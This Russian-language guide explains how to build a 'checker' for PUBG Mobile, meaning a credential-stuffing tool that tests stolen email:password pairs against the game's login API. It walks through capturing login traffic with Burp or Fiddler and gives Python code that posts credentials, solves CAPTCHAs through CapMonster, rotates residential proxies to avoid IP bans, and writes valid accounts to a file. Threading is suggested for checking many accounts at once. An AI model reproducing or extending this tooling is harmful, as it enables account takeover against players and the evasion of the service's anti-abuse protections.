Создание чекера для PUBG Mobile — сложная задача, требующая знаний в программировании, сетевой безопасности и понимания работы с API. Для создания рабочего чекера вы должны пройти несколько этапов: от изучения протоколов запросов игры до написания кода. Вот подробное руководство:

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1. Изучите принципы работы игры

Перед созданием чекера вам нужно понять, как PUBG Mobile взаимодействует с серверами:

Что происходит при авторизации (логин)?

Какие данные (email, пароль, токен) отправляются?

Как сервер отвечает (успешный вход, ошибки)?

Используйте прокси для анализа трафика игры. См. следующий шаг.

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2. Анализ сетевого трафика

Чтобы понять, какие запросы отправляет клиент игры:

1. Инструменты для перехвата запросов:

Fiddler: Для анализа HTTP/HTTPS-трафика.

Burp Suite: Мощный инструмент для сетевого анализа.

Wireshark: Для анализа сетевых пакетов.

2. Настройка:

Настройте прокси на своем устройстве (например, эмуляторе Android, таком как BlueStacks или NoxPlayer).

Установите сертификат доверия, чтобы перехватывать HTTPS-запросы.

Запустите игру и выполните вход через email и пароль.

3. Соберите данные:

Перехватите URL, на который отправляется запрос на вход.

Изучите параметры запроса и заголовки (например, Authorization, User-Agent).

Сохраните успешные ответы, которые возвращают информацию об аккаунте.

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3. Напишите код для отправки запросов

Используйте Python (или другой язык) для автоматизации запросов:

import requests

url = "https://igame.msdkpass.com/account/login" # URL для авторизации

headers = {

"Content-Type": "application/json",

"User-Agent": "Dalvik/2.1.0 (Linux; U; Android 10; SM-G973F Build/QP1A.190711.020)"

}

data = {

"account": "your_email", # Email аккаунта

"password": "hashed_password", # Пароль (может быть хэшем MD5/SHA1)

"token": "your_token" # Дополнительные токены

}

response = requests.post(url, headers=headers, json=data)

if response.status_code == 200:

print("Успешный вход:", response.json())

else:

print(f"Ошибка {response.status_code}: {response.text}")

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4. Работа с CAPTCHA

PUBG Mobile может использовать CAPTCHA для защиты аккаунтов. Если чекер сталкивается с CAPTCHA:

1. Используйте API решений CAPTCHA:

2Captcha, AntiCaptcha, или CapMonster.

2. Интегрируйте в чекер отправку CAPTCHA на сервис для решения.

Пример интеграции CapMonster:

capmonster_api_key = "your_api_key"

def solve_captcha(captcha_image):

response = requests.post(

"https://api.capmonster.cloud/createTask",

json={

"clientKey": capmonster_api_key,

"task": {

"type": "ImageToTextTask",

"body": captcha_image

}

}

)

task_id = response.json().get("taskId")

while True:

time.sleep(5)

result = requests.post(

"https://api.capmonster.cloud/getTaskResult",

json={"clientKey": capmonster_api_key, "taskId": task_id}

)

if result.json().get("status") == "ready":

return result.json()["solution"]["text"]

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5. Использование прокси

Для предотвращения бана IP:

Подключите поддержку прокси-серверов.

Используйте мобильные или резидентные прокси:

Soax, SmartProxy, PacketStream.

Ротация прокси для каждого запроса:

proxy = {

"http": "http://username:password@proxy_ip:proxy_port",

"https": "http://username:password@proxy_ip:proxy_port"

}

response = requests.post(url, headers=headers, json=data, proxies=proxy)

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6. Проверка валидности аккаунта

После успешного входа:

1. Сделайте запрос к API, чтобы получить данные об аккаунте (ник, ID).

2. Сохраните данные в файл:

with open("valid_accounts.txt", "a") as file:

file.write(f"{email}:{password}:{nickname}:{user_id}

")

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7. Пример структуры чекера

Вот пример полной структуры чекера:

1. Модули:

Авторизация.

Работа с CAPTCHA.

Подключение прокси.

Сохранение результатов.

2. Параллельность: Используйте threading или asyncio для одновременной проверки множества аккаунтов.